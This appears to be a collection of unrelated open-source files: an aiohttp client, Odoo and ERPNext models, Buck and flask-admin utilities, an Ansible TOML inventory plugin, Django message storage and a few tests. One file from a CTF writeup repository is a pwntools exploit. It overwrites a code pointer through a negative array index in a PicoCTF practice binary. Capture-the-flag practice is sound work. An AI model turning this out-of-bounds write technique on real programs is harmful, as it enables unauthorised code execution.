    * https://github.com/aio-libs/aiohttp/issues/1568
    * http://bugs.python.org/issue29406

    In addition, connection pooling with proxies in aiohttp seems to be bug-ridden as well.
    For example:

        >>> client = Client()
        >>> client.get('https://httpbin.org/ip')
        >>> client.get('https://httpbin.org/ip', proxy='...')

    Both response bodies will show the IP address of the machine on which the client is being run.
    The workaround is defining a custom TCPConnector and force connections to close:

        >>> client = Client(connector=aiohttp.TCPConnector(force_close=True))

    This has an appreciable negative impact on performance.
    """

    def __init__(self, connections=100, cookie_jar=None, connector=None):
        self.cookie_jar = cookie_jar
        if connector is None:
            # dedicated loop for this client; requests are submitted to it
            # from the caller's thread via run_coroutine_threadsafe
            self.event_loop = asyncio.SelectorEventLoop()
            connector = aiohttp.TCPConnector(limit=connections, loop=self.event_loop)
        else:
            # NOTE(review): reaches into aiohttp's private _loop attribute to
            # reuse the loop the caller's connector is already bound to
            self.event_loop = connector._loop
        self.connector = connector
        # ensure pooled connections are closed at interpreter shutdown
        atexit.register(self.connector.close)
        self.futures = Futures()
        # daemon thread runs the event loop forever in the background, so the
        # public API never blocks on I/O
        self.thread = threading.Thread(target=self.event_loop.run_forever, daemon=True)
        self.thread.start()

    def get(self, *args, **kwargs):
        return self._request('get', *args, **kwargs)

    def put(self, *args, **kwargs):
        return self._request('put', *args, **kwargs)

    def post(self, *args, **kwargs):
        return self._request('post', *args, **kwargs)

    def delete(self, *args, **kwargs):
        return self._request('delete', *args, **kwargs)

    def head(self, *args, **kwargs):
        return self._request('head', *args, **kwargs)

    def options(self, *args, **kwargs):
        return self._request('options', *args, **kwargs)

    def _request(self, method_name, *args, **kwargs):
        """Submit the request to the event loop running in thread and bind the future to the client.
        """
        request = _arequest(
            method_name,
            self.event_loop,
            self.connector,
            self.cookie_jar,
            *args,
            **kwargs,
        )
        # bridge from the caller's (synchronous) thread into the loop thread
        future = asyncio.run_coroutine_threadsafe(request, self.event_loop)
        # requests-flavored alias: future.response() == future.result()
        future.response = future.result
        # stash enough context on the future to replay the request later
        future._request = {
            'client': self,
            'method_name': method_name,
            '*args': args,
            '**kwargs': kwargs,
        }
        def repeat(future):
            """Repeat the request that yielded this future with the same client and arguments.
            """
            request = future._request
            client = request['client']
            method = getattr(client, method_name)
            args = request['*args']
            kwargs = request['**kwargs']
            return method(*args, **kwargs)
        future.repeat = future.retry = types.MethodType(repeat, future)
        self.futures.add(future)
        return future
| mit |
andreparames/odoo | addons/board/board.py | 69 | 6646 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2013 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from operator import itemgetter
from textwrap import dedent
from openerp import tools, SUPERUSER_ID
from openerp.osv import fields, osv
class board_board(osv.osv):
    _name = 'board.board'
    _description = "Board"
    _auto = False   # no backing SQL table: dashboards are purely view-driven
    _columns = {}

    @tools.cache()
    def list(self, cr, uid, context=None):
        """Return [{'id': menu_id, 'name': menu_name}] for every menu entry
        that opens a board.board action.  Cached; see _clear_list_cache().
        """
        Actions = self.pool.get('ir.actions.act_window')
        Menus = self.pool.get('ir.ui.menu')
        IrValues = self.pool.get('ir.values')

        act_ids = Actions.search(cr, uid, [('res_model', '=', self._name)], context=context)
        refs = ['%s,%s' % (Actions._name, act_id) for act_id in act_ids]

        # cannot search "action" field on menu (non stored function field without search_fnct)
        irv_ids = IrValues.search(cr, uid, [
            ('model', '=', 'ir.ui.menu'),
            ('key', '=', 'action'),
            ('key2', '=', 'tree_but_open'),
            ('value', 'in', refs),
        ], context=context)
        menu_ids = map(itemgetter('res_id'), IrValues.read(cr, uid, irv_ids, ['res_id'], context=context))
        menu_names = Menus.name_get(cr, uid, menu_ids, context=context)
        return [dict(id=m[0], name=m[1]) for m in menu_names]

    def _clear_list_cache(self):
        # invalidate the @tools.cache() memoization on list()
        self.list.clear_cache(self)

    def create(self, cr, user, vals, context=None):
        # boards are not creatable as records; silently ignore and return 0
        return 0

    def fields_view_get(self, cr, user, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
        """
        Overrides orm field_view_get.
        @return: Dictionary of Fields, arch and toolbar.
        """
        res = {}
        res = super(board_board, self).fields_view_get(cr, user, view_id, view_type,
                                                       context, toolbar=toolbar, submenu=submenu)

        # prefer the user's personal customization of this view, if any
        CustView = self.pool.get('ir.ui.view.custom')
        vids = CustView.search(cr, user, [('user_id', '=', user), ('ref_id', '=', view_id)], context=context)
        if vids:
            view_id = vids[0]
            arch = CustView.browse(cr, user, view_id, context=context)
            res['custom_view_id'] = view_id
            res['arch'] = arch.arch
        res['arch'] = self._arch_preprocessing(cr, user, res['arch'], context=context)
        res['toolbar'] = {'print': [], 'action': [], 'relate': []}
        return res

    def _arch_preprocessing(self, cr, user, arch, context=None):
        from lxml import etree
        def remove_unauthorized_children(node):
            # recursively strip <action> nodes flagged invisible for this user
            for child in node.iterchildren():
                if child.tag == 'action' and child.get('invisible'):
                    node.remove(child)
                else:
                    child = remove_unauthorized_children(child)
            return node

        def encode(s):
            # lxml wants bytes; this file is Python 2, hence `unicode`
            if isinstance(s, unicode):
                return s.encode('utf8')
            return s

        archnode = etree.fromstring(encode(arch))
        return etree.tostring(remove_unauthorized_children(archnode), pretty_print=True)
class board_create(osv.osv_memory):
    """Wizard creating a new, empty dashboard.

    Creates the backing form view, a window action on ``board.board`` and a
    menu entry, then asks the web client to reload so the new menu appears.
    """

    def board_create(self, cr, uid, ids, context=None):
        # Wizard is always confirmed on a single transient record.
        assert len(ids) == 1
        this = self.browse(cr, uid, ids[0], context=context)

        # Empty two-column board layout; %s is the user-chosen board name.
        view_arch = dedent("""<?xml version="1.0"?>
            <form string="%s" version="7.0">
            <board style="2-1">
            <column/>
            <column/>
            </board>
            </form>
        """.strip() % (this.name,))

        view_id = self.pool.get('ir.ui.view').create(cr, uid, {
            'name': this.name,
            'model': 'board.board',
            'priority': 16,
            'type': 'form',
            'arch': view_arch,
        }, context=context)

        action_id = self.pool.get('ir.actions.act_window').create(cr, uid, {
            'name': this.name,
            'view_type': 'form',
            'view_mode': 'form',
            'res_model': 'board.board',
            'usage': 'menu',
            'view_id': view_id,
            # Help HTML shown while the dashboard has no content yet.
            'help': dedent('''<div class="oe_empty_custom_dashboard">
                  <p>
                    <b>This dashboard is empty.</b>
                  </p><p>
                    To add the first report into this dashboard, go to any
                    menu, switch to list or graph view, and click <i>'Add to
                    Dashboard'</i> in the extended search options.
                  </p><p>
                    You can filter and group data before inserting into the
                    dashboard using the search options.
                  </p>
                </div>
            ''')
        }, context=context)

        # Created as SUPERUSER so regular users can add dashboards even
        # without write access on ir.ui.menu.
        menu_id = self.pool.get('ir.ui.menu').create(cr, SUPERUSER_ID, {
            'name': this.name,
            'parent_id': this.menu_parent_id.id,
            'action': 'ir.actions.act_window,%s' % (action_id,)
        }, context=context)

        # Invalidate the cached dashboard list (see board_board.list).
        self.pool.get('board.board')._clear_list_cache()

        return {
            'type': 'ir.actions.client',
            'tag': 'reload',
            'params': {
                'menu_id': menu_id
            },
        }

    def _default_menu_parent_id(self, cr, uid, context=None):
        # Default parent menu: Reporting / Dashboard from the base module.
        _, menu_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'menu_reporting_dashboard')
        return menu_id

    _name = "board.create"
    _description = "Board Creation"
    _columns = {
        'name': fields.char('Board Name', required=True),
        'menu_parent_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
    }
    _defaults = {
        'menu_parent_id': _default_menu_parent_id,
    }
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
suyashphadtare/sajil-final-erp | erpnext/utilities/doctype/contact/contact.py | 36 | 2444 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, extract_email_id
from erpnext.controllers.status_updater import StatusUpdater
class Contact(StatusUpdater):
    """Party contact: name derives from first/last name plus the linked party,
    and at most one contact per party may be flagged primary."""

    def autoname(self):
        # concat first and last name
        self.name = " ".join(filter(None,
            [cstr(self.get(f)).strip() for f in ["first_name", "last_name"]]))

        # concat party name if reqd -- first non-empty link wins.
        for fieldname in ("customer", "supplier", "sales_partner"):
            if self.get(fieldname):
                self.name = self.name + "-" + cstr(self.get(fieldname)).strip()
                break

    def validate(self):
        self.set_status()
        self.validate_primary_contact()

    def validate_primary_contact(self):
        """Keep exactly one primary contact per linked party.

        If this contact is primary, demote every other contact of the same
        party; otherwise promote this one when the party has no primary yet.
        """
        if self.is_primary_contact == 1:
            if self.customer:
                frappe.db.sql("update tabContact set is_primary_contact=0 where customer = %s",
                    (self.customer))
            elif self.supplier:
                frappe.db.sql("update tabContact set is_primary_contact=0 where supplier = %s",
                    (self.supplier))
            elif self.sales_partner:
                frappe.db.sql("""update tabContact set is_primary_contact=0
                    where sales_partner = %s""", (self.sales_partner))
        else:
            if self.customer:
                if not frappe.db.sql("select name from tabContact \
                        where is_primary_contact=1 and customer = %s", (self.customer)):
                    self.is_primary_contact = 1
            elif self.supplier:
                if not frappe.db.sql("select name from tabContact \
                        where is_primary_contact=1 and supplier = %s", (self.supplier)):
                    self.is_primary_contact = 1
            elif self.sales_partner:
                if not frappe.db.sql("select name from tabContact \
                        where is_primary_contact=1 and sales_partner = %s",
                        self.sales_partner):
                    self.is_primary_contact = 1

    def on_trash(self):
        # Detach this contact from any support tickets referencing it.
        frappe.db.sql("""update `tabSupport Ticket` set contact='' where contact=%s""",
            self.name)
@frappe.whitelist()
def get_contact_details(contact):
    """Return display fields for *contact* (a Contact document name).

    Whitelisted: callable from the client through frappe's RPC layer.
    """
    contact = frappe.get_doc("Contact", contact)
    out = {
        "contact_person": contact.get("name"),
        "contact_display": " ".join(filter(None,
            [contact.get("first_name"), contact.get("last_name")])),
        "contact_email": contact.get("email_id"),
        "contact_mobile": contact.get("mobile_no"),
        "contact_phone": contact.get("phone"),
        "contact_designation": contact.get("designation"),
        "contact_department": contact.get("department")
    }
    return out
Caesurus/CTF_Writeups | 2019-PicoCTF/exploits/exploit_limitless.py | 1 | 1649 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
# Binary under test; assigning to context.binary also configures pwntools
# (arch, bits, endianness) from the ELF headers.
exe = context.binary = ELF('./vuln')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
    '''Launch the target binary, under GDB when requested on the CLI.'''
    target = [exe.path] + argv
    if args.GDB:
        return gdb.debug(target, gdbscript=gdbscript, *a, **kw)
    return process(target, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
#break *0x{exe.symbols.main:x}
b *0x0804865c
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

# Target program prompts (for reference):
"""
Input the integer value you want to put in the array
1
Input the index in which you want to put the value
"""

io = start()

# Out-of-bounds write: a negative index lands before the array and
# overwrites a code pointer with this address.
# NOTE(review): 0x080485c6 is presumably the address of a win/flag
# function in ./vuln, and -5 the offset to the clobbered pointer --
# confirm against the binary's disassembly.
value = 0x080485c6
idx = -5

io.recvuntil("put in the array")
io.sendline(str(value))
io.recvuntil("to put the value")
io.sendline(str(idx))

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)

# flag = io.recv(...)
# log.success(flag)

io.interactive()
| apache-2.0 |
zhan-xiong/buck | src/com/facebook/buck/json/buck_parser/util.py | 17 | 3019 | """Buck agnostic utility functions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import with_statement
from collections import namedtuple
import copy
import functools
import inspect
import subprocess
import sys
import os
def is_in_dir(filepath, directory):
    """Return True if `filepath` lies inside `directory`."""
    abs_path = os.path.abspath(filepath)
    # Normalize and force a trailing separator so '/a/foo.py' does not
    # falsely match directory '/a/f'.
    abs_dir = os.path.join(os.path.abspath(directory), '')
    return abs_path.startswith(abs_dir)
def get_caller_frame(skip=None):
    """Return the stack frame of the nearest caller outside skipped modules.

    :param list[str] skip: extra module ``__name__`` values to step over
        (this module is always skipped).
    :rtype: types.FrameType
    """
    skipped = {__name__}
    if skip is not None:
        skipped.update(skip)
    frame = inspect.currentframe()
    # '__name__' may be missing when code was run through eval(); .get()
    # then yields None, which simply never matches the skip set.
    while frame.f_globals.get('__name__') in skipped:
        frame = frame.f_back
    return frame
def cygwin_adjusted_path(path):
    """Translate a Windows path to its unix form when running under cygwin."""
    if sys.platform != 'cygwin':
        return path
    # cygpath prints the translated path followed by a newline.
    return subprocess.check_output(['cygpath', path]).rstrip()
def memoized(deepcopy=True, keyfunc=None):
    """Decorator factory: cache a function's return value per argument set.

    Later calls with the same arguments return the cached value instead of
    re-evaluating.  By default a defensive deep copy of the cached value is
    handed back, so callers mutating the result do not poison the cache;
    pass ``deepcopy=False`` to skip the copy.  ``keyfunc`` may supply a
    custom cache-key function taking the same arguments as the wrapped
    function.
    """
    def decorator(func):
        results = {}

        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Poor-man's cache key: keyword args are sorted so dictionary
            # ordering (insertion/deletion order) cannot cause misses.
            # Nested dictionaries will still cause cache misses.
            if keyfunc is not None:
                key = keyfunc(*args, **kwargs)
            else:
                key = repr(args) + repr(sorted(kwargs.items()))
            try:
                result = results[key]
            except KeyError:
                result = func(*args, **kwargs)
                results[key] = result
            return copy.deepcopy(result) if deepcopy else result

        wrapper._cache = results
        return wrapper
    return decorator
# Structured record for reporting parser problems back to the caller:
# a human-readable message, a severity level, the source that produced it,
# and the originating exception (if any).
Diagnostic = namedtuple('Diagnostic', ['message', 'level', 'source', 'exception'])
def is_special(pat):
    """Whether the given pattern string contains glob match constructs."""
    return any(meta in pat for meta in ('*', '?', '['))
| apache-2.0 |
toddetzel/flask-admin | flask_admin/contrib/mongoengine/typefmt.py | 44 | 1357 | from jinja2 import Markup, escape
from mongoengine.base import BaseList
from mongoengine.fields import GridFSProxy, ImageGridFsProxy
from flask_admin.model.typefmt import BASE_FORMATTERS, list_formatter
from . import helpers
def grid_formatter(view, value):
    """Render a GridFS file as a download link with size and content type."""
    if not value.grid_id:
        return ''

    file_args = helpers.make_gridfs_args(value)
    template = ('<a href="%(url)s" target="_blank">'
                '<i class="icon-file"></i>%(name)s'
                '</a> %(size)dk (%(content_type)s)')
    return Markup(template % {
        'url': view.get_url('.api_file_view', **file_args),
        'name': escape(value.name),
        'size': value.length // 1024,
        'content_type': escape(value.content_type)
    })
def grid_image_formatter(view, value):
    """Render a GridFS image as a clickable thumbnail."""
    if not value.grid_id:
        return ''

    full_url = view.get_url('.api_file_view', **helpers.make_gridfs_args(value))
    thumb_url = view.get_url('.api_file_view', **helpers.make_thumb_args(value))
    template = ('<div class="image-thumbnail">'
                '<a href="%(url)s" target="_blank"><img src="%(thumb)s"/></a>'
                '</div>')
    return Markup(template % {'url': full_url, 'thumb': thumb_url})
# Start from flask-admin's base type formatters and register the
# mongoengine-specific field types on top of them.
DEFAULT_FORMATTERS = BASE_FORMATTERS.copy()
DEFAULT_FORMATTERS.update({
    BaseList: list_formatter,
    GridFSProxy: grid_formatter,
    ImageGridFsProxy: grid_image_formatter
})
| bsd-3-clause |
maxamillion/ansible | lib/ansible/plugins/inventory/toml.py | 29 | 8190 | # Copyright (c) 2018 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = r'''
name: toml
version_added: "2.8"
short_description: Uses a specific TOML file as an inventory source.
description:
- TOML based inventory format
- File MUST have a valid '.toml' file extension
notes:
- Requires the 'toml' python library
'''
EXAMPLES = r'''# fmt: toml
# Example 1
[all.vars]
has_java = false
[web]
children = [
"apache",
"nginx"
]
vars = { http_port = 8080, myvar = 23 }
[web.hosts]
host1 = {}
host2 = { ansible_port = 222 }
[apache.hosts]
tomcat1 = {}
tomcat2 = { myvar = 34 }
tomcat3 = { mysecret = "03#pa33w0rd" }
[nginx.hosts]
jenkins1 = {}
[nginx.vars]
has_java = true
# Example 2
[all.vars]
has_java = false
[web]
children = [
"apache",
"nginx"
]
[web.vars]
http_port = 8080
myvar = 23
[web.hosts.host1]
[web.hosts.host2]
ansible_port = 222
[apache.hosts.tomcat1]
[apache.hosts.tomcat2]
myvar = 34
[apache.hosts.tomcat3]
mysecret = "03#pa33w0rd"
[nginx.hosts.jenkins1]
[nginx.vars]
has_java = true
# Example 3
[ungrouped.hosts]
host1 = {}
host2 = { ansible_host = "127.0.0.1", ansible_port = 44 }
host3 = { ansible_host = "127.0.0.1", ansible_port = 45 }
[g1.hosts]
host4 = {}
[g2.hosts]
host4 = {}
'''
import os
from functools import partial
from ansible.errors import AnsibleFileNotFound, AnsibleParserError
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.module_utils.common._collections_compat import MutableMapping, MutableSequence
from ansible.module_utils.six import string_types, text_type
from ansible.parsing.yaml.objects import AnsibleSequence, AnsibleUnicode
from ansible.plugins.inventory import BaseFileInventoryPlugin
from ansible.utils.display import Display
from ansible.utils.unsafe_proxy import AnsibleUnsafeBytes, AnsibleUnsafeText
# 'toml' is an optional dependency; parse() raises a friendly error when
# it is missing (see InventoryModule.parse).
try:
    import toml
    HAS_TOML = True
except ImportError:
    HAS_TOML = False

display = Display()

if HAS_TOML and hasattr(toml, 'TomlEncoder'):
    # toml >= 0.10.0: plug our YAML object types into the encoder directly.
    class AnsibleTomlEncoder(toml.TomlEncoder):
        def __init__(self, *args, **kwargs):
            super(AnsibleTomlEncoder, self).__init__(*args, **kwargs)
            # Map our custom YAML object types to dump_funcs from ``toml``
            self.dump_funcs.update({
                AnsibleSequence: self.dump_funcs.get(list),
                AnsibleUnicode: self.dump_funcs.get(str),
                AnsibleUnsafeBytes: self.dump_funcs.get(str),
                AnsibleUnsafeText: self.dump_funcs.get(str),
            })
    toml_dumps = partial(toml.dumps, encoder=AnsibleTomlEncoder())
else:
    # toml < 0.10.0 has no pluggable encoder: cleanse the data to native
    # types before handing it over.
    def toml_dumps(data):
        return toml.dumps(convert_yaml_objects_to_native(data))
def convert_yaml_objects_to_native(obj):
    """Recursively rebuild *obj* out of native dict/list/text types.

    Older versions of the ``toml`` python library don't have a pluggable
    way to tell the encoder about custom types, so objects must be cleansed
    to native types before being handed to ``toml``.  Only used on
    ``toml<0.10.0`` where ``toml.TomlEncoder`` is missing.

    Rather than checking directly for the types from
    ``ansible.parsing.yaml.objects``, this checks the types they inherit
    from, for flexibility.
    """
    if isinstance(obj, dict):
        return {key: convert_yaml_objects_to_native(val) for key, val in obj.items()}
    if isinstance(obj, list):
        return [convert_yaml_objects_to_native(item) for item in obj]
    if isinstance(obj, text_type):
        return text_type(obj)
    return obj
class InventoryModule(BaseFileInventoryPlugin):
    """Static-inventory plugin reading groups/hosts/vars from a TOML file."""

    NAME = 'toml'

    def _parse_group(self, group, group_data):
        """Create *group* in the inventory and load its ``vars``,
        ``children`` and ``hosts`` sections from *group_data*."""
        if group_data is not None and not isinstance(group_data, MutableMapping):
            self.display.warning("Skipping '%s' as this is not a valid group definition" % group)
            return

        group = self.inventory.add_group(group)
        if group_data is None:
            return

        for key, data in group_data.items():
            if key == 'vars':
                if not isinstance(data, MutableMapping):
                    raise AnsibleParserError(
                        'Invalid "vars" entry for "%s" group, requires a dict, found "%s" instead.' %
                        (group, type(data))
                    )
                for var, value in data.items():
                    self.inventory.set_variable(group, var, value)

            elif key == 'children':
                if not isinstance(data, MutableSequence):
                    raise AnsibleParserError(
                        'Invalid "children" entry for "%s" group, requires a list, found "%s" instead.' %
                        (group, type(data))
                    )
                for subgroup in data:
                    # Ensure the child group exists before linking it.
                    self._parse_group(subgroup, {})
                    self.inventory.add_child(group, subgroup)

            elif key == 'hosts':
                if not isinstance(data, MutableMapping):
                    raise AnsibleParserError(
                        'Invalid "hosts" entry for "%s" group, requires a dict, found "%s" instead.' %
                        (group, type(data))
                    )
                for host_pattern, value in data.items():
                    # A pattern may expand to several hosts and carry a port.
                    hosts, port = self._expand_hostpattern(host_pattern)
                    self._populate_host_vars(hosts, value, group, port)
            else:
                self.display.warning(
                    'Skipping unexpected key "%s" in group "%s", only "vars", "children" and "hosts" are valid' %
                    (key, group)
                )

    def _load_file(self, file_name):
        """Read *file_name* through the dataloader and parse it as TOML.

        Raises AnsibleParserError for invalid names, TOML syntax errors,
        I/O failures and anything else unexpected.
        """
        if not file_name or not isinstance(file_name, string_types):
            raise AnsibleParserError("Invalid filename: '%s'" % to_native(file_name))

        b_file_name = to_bytes(self.loader.path_dwim(file_name))
        if not self.loader.path_exists(b_file_name):
            raise AnsibleFileNotFound("Unable to retrieve file contents", file_name=file_name)

        try:
            (b_data, private) = self.loader._get_file_contents(file_name)
            return toml.loads(to_text(b_data, errors='surrogate_or_strict'))
        except toml.TomlDecodeError as e:
            raise AnsibleParserError(
                'TOML file (%s) is invalid: %s' % (file_name, to_native(e)),
                orig_exc=e
            )
        except (IOError, OSError) as e:
            raise AnsibleParserError(
                "An error occurred while trying to read the file '%s': %s" % (file_name, to_native(e)),
                orig_exc=e
            )
        except Exception as e:
            raise AnsibleParserError(
                "An unexpected error occurred while parsing the file '%s': %s" % (file_name, to_native(e)),
                orig_exc=e
            )

    def parse(self, inventory, loader, path, cache=True):
        ''' parses the inventory file '''
        if not HAS_TOML:
            raise AnsibleParserError(
                'The TOML inventory plugin requires the python "toml" library'
            )

        super(InventoryModule, self).parse(inventory, loader, path)
        self.set_options()

        try:
            data = self._load_file(path)
        except Exception as e:
            raise AnsibleParserError(e)

        if not data:
            raise AnsibleParserError('Parsed empty TOML file')
        elif data.get('plugin'):
            # A top-level 'plugin' key marks a plugin configuration file,
            # not a static TOML inventory.
            raise AnsibleParserError('Plugin configuration TOML file, not TOML inventory')

        for group_name in data:
            self._parse_group(group_name, data[group_name])

    def verify_file(self, path):
        # Only accept files carrying a literal '.toml' extension.
        if super(InventoryModule, self).verify_file(path):
            file_name, ext = os.path.splitext(path)
            if ext == '.toml':
                return True
        return False
| gpl-3.0 |
cntnboys/410Lab6 | build/django/django/contrib/messages/storage/session.py | 288 | 1705 | import json
from django.contrib.messages.storage.base import BaseStorage
from django.contrib.messages.storage.cookie import MessageEncoder, MessageDecoder
from django.utils import six
class SessionStorage(BaseStorage):
    """
    Stores messages in the session (that is, django.contrib.sessions).
    """
    session_key = '_messages'

    def __init__(self, request, *args, **kwargs):
        assert hasattr(request, 'session'), "The session-based temporary "\
            "message storage requires session middleware to be installed, "\
            "and come before the message middleware in the "\
            "MIDDLEWARE_CLASSES list."
        super(SessionStorage, self).__init__(request, *args, **kwargs)

    def _get(self, *args, **kwargs):
        """
        Retrieves a list of messages from the request's session. This storage
        always stores everything it is given, so return True for the
        all_retrieved flag.
        """
        return self.deserialize_messages(self.request.session.get(self.session_key)), True

    def _store(self, messages, response, *args, **kwargs):
        """
        Stores a list of messages to the request's session.
        """
        if messages:
            self.request.session[self.session_key] = self.serialize_messages(messages)
        else:
            # No messages left: drop the key rather than storing an empty list.
            self.request.session.pop(self.session_key, None)
        # Everything was stored; there are never unstored messages.
        return []

    def serialize_messages(self, messages):
        # Compact separators keep the session payload small.
        encoder = MessageEncoder(separators=(',', ':'))
        return encoder.encode(messages)

    def deserialize_messages(self, data):
        # Only decode JSON strings; pass through None / already-decoded data.
        if data and isinstance(data, six.string_types):
            return json.loads(data, cls=MessageDecoder)
        return data
| apache-2.0 |
Vauxoo/stock-logistics-warehouse | stock_orderpoint_uom/models/stock_warehouse_orderpoint.py | 2 | 1028 | # Copyright 2016-17 Eficent Business and IT Consulting Services S.L.
# (http://www.eficent.com)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import api, fields, models, _
from odoo.exceptions import UserError
class Orderpoint(models.Model):
    _inherit = "stock.warehouse.orderpoint"

    # Optional UoM for generated procurements, overriding the product's
    # default UoM; must belong to the same UoM category (see constraint).
    procure_uom_id = fields.Many2one(comodel_name='uom.uom',
                                     string="Procurement UoM")

    @api.constrains('product_id', 'procure_uom_id')
    def _check_procure_uom(self):
        """Reject a procurement UoM whose category differs from the product
        UoM's category, since conversion between them is impossible."""
        if any(orderpoint.product_uom and
               orderpoint.procure_uom_id and
               orderpoint.product_uom.category_id !=
               orderpoint.procure_uom_id.category_id
               for orderpoint in self):
            raise UserError(
                _('Error: The product default Unit of Measure and '
                  'the procurement Unit of Measure must be in the '
                  'same category.'))
        return True
| agpl-3.0 |
tpokorra/pykolab | tests/unit/test-005-timezone.py | 2 | 2718 | import datetime
import icalendar
import os
import pytz
import unittest
from pykolab.xml import Attendee
from pykolab.xml import Event
from pykolab.xml import EventIntegrityError
from pykolab.xml import InvalidAttendeeParticipantStatusError
from pykolab.xml import InvalidEventDateError
from pykolab.xml import event_from_ical
class TestTimezone(unittest.TestCase):

    def test_001_timezone_conflict(self):
        """Round-trip the same event through iTip in two timezones and check
        the re-parsed events serialize to identical XML, i.e. timezone data
        survives the iCal round-trip intact."""
        # class datetime.timedelta([days[, seconds[, microseconds[, milliseconds[, minutes[, hours[, weeks]]]]]]])
        tdelta = datetime.timedelta(0, 0, 0, 0, 0, 1)

        event_start = datetime.datetime.now(pytz.timezone("UTC"))
        event_end = datetime.datetime.now(pytz.timezone("UTC")) + tdelta

        london = Event()
        london.set_organizer("john.doe@example.org", "Doe, John")
        london.add_attendee("resource-car-vw@example.org", cutype="RESOURCE")
        london.set_start(event_start.replace(tzinfo=pytz.timezone("Europe/London")))
        london.set_end(event_end.replace(tzinfo=pytz.timezone("Europe/London")))

        zurich = Event()
        zurich.set_organizer("john.doe@example.org", "Doe, John")
        zurich.add_attendee("resource-car-vw@example.org", cutype="RESOURCE")
        zurich.set_start(event_start.replace(tzinfo=pytz.timezone("Europe/Zurich")))
        zurich.set_end(event_end.replace(tzinfo=pytz.timezone("Europe/Zurich")))

        # Reference XML serializations taken before the round-trip.
        london_xml = london.__str__()
        zurich_xml = zurich.__str__()

        #print london_xml
        #print zurich_xml

        london_itip = london.as_string_itip()
        zurich_itip = zurich.as_string_itip()

        del london, zurich

        #print london_itip
        #print zurich_itip

        # Re-parse each event from its iTip (iCal) representation.
        london_cal = icalendar.Calendar.from_ical(london_itip)
        london = event_from_ical(london_cal.walk('VEVENT')[0].to_ical())

        zurich_cal = icalendar.Calendar.from_ical(zurich_itip)
        zurich = event_from_ical(zurich_cal.walk('VEVENT')[0].to_ical())

        #fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-london1')), 'w')
        #fp.write(london_xml)
        #fp.close()
        #fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-london2')), 'w')
        #fp.write(london.__str__())
        #fp.close()
        #fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-zurich1')), 'w')
        #fp.write(zurich_xml)
        #fp.close()
        #fp = open(os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'event-zurich2')), 'w')
        #fp.write(zurich.__str__())
        #fp.close()

        self.assertEqual(london_xml, london.__str__())
        self.assertEqual(zurich_xml, zurich.__str__())
| gpl-3.0 |
robclark/chromium | chrome/test/functional/chromeos_security.py | 9 | 9404 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import pyauto_functional
import pyauto
class ChromeosSecurity(pyauto.PyUITest):
  """Security tests for chrome on ChromeOS.

  Requires ChromeOS to be logged in.
  """

  def setUp(self):
    # Load the expected extension-permission baseline from the private
    # test-data directory; all tests compare against it.
    pyauto.PyUITest.setUp(self)
    baseline_file = os.path.abspath(os.path.join(
        pyauto.PyUITest.DataDir(), 'pyauto_private', 'chromeos',
        'security', 'extension_permission_baseline.txt'))
    self.assertTrue(os.path.exists(baseline_file),
                    msg='Baseline info file does not exist.')
    baseline_info = self.EvalDataFrom(baseline_file)
    self._bundled_crx_directory = baseline_info['BUNDLED_CRX_DIRECTORY']
    self._bundled_crx_baseline = baseline_info['BUNDLED_CRX_BASELINE']
    self._component_extension_baseline = (
        baseline_info['COMPONENT_EXTENSION_BASELINE'])
    # Official builds ship extra component extensions.
    if self.GetBrowserInfo()['properties']['is_official']:
      self._component_extension_baseline.extend(
          baseline_info['OFFICIAL_COMPONENT_EXTENSIONS'])

  def ExtraChromeFlags(self):
    """Override default list of extra flags typically used with automation.

    See the default flags used with automation in pyauto.py.
    Chrome flags for this test should be as close to reality as possible.
    """
    return [
      '--homepage=about:blank',
    ]

  def testCannotViewLocalFiles(self):
    """Verify that local files cannot be accessed from the browser."""
    urls_and_titles = {
       'file:///': 'Index of /',
